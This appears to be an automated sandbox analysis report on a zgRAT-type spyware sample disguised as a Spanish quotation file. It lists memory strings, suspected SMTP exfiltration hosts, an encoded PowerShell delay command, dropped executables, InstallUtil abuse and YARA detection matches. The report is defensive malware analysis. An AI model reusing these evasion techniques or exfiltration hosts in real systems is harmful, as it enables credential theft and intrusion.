                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.0000000003121000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000319E000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.thanhphoung-vn.com
                Source: Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.000000000319E000.00000004.00000800.00020000.00000000.sdmp, Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.0000000003121000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: Hxpqwdnjsynypvjkzfile.exe, 0000000C.00000002.530884956.0000000003121000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 0000000F.00000002.530714621.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC70AFB000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC39C21000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.551519357.000001DC422C0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 00000010.00000002.536343238.0000027D2E371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.7:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: KbWSe.exe, 0000000F.00000002.522792614.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 13.2.InstallUtil.exe.26e32acd7b8.6.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth (Nextron Systems), description = Detects typical strings in a reversed or otherwise modified form, score = , reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec7091b788.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 13.2.InstallUtil.exe.26e32acd7b8.6.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth (Nextron Systems), description = Detects typical strings in a reversed or otherwise modified form, score = , reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70624338.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec708cb750.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70afb7f8.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_0140C978
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_0140A9B8
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_01409DA0
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_0140A0E8
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_01403B48
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_05A5CF50
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeCode function: 12_2_05A5EB40
                Source: explorers.exe.0.drStatic PE information: No import functions for PE file found
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: No import functions for PE file found
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000003.345270978.000001EC71DA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000000.245208821.000001EC5E382000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecotizaci vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC608D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKnobhafsytenn.dll" vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC70AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePAPIFILE 1.exe" vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC70AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKnobhafsytenn.dll" vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000003.345270978.000001EC71D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000003.345430789.000001EC78B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecotizaci vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.353733529.000001EC5E7A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC6041E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePAPIFILE 1.exe" vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe 7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe 7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeReversingLabs: Detection: 26%
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeVirustotal: Detection: 24%
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile read: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeJump to behavior
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe "C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe"
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\explorers.exe "C:\Users\user\AppData\Local\explorers.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                Source: C:\Users\user\AppData\Local\explorers.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe "C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe"
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                Source: C:\Users\user\AppData\Local\explorers.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile created: C:\Users\user\AppData\Local\explorers.exeJump to behavior
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/11@19/6
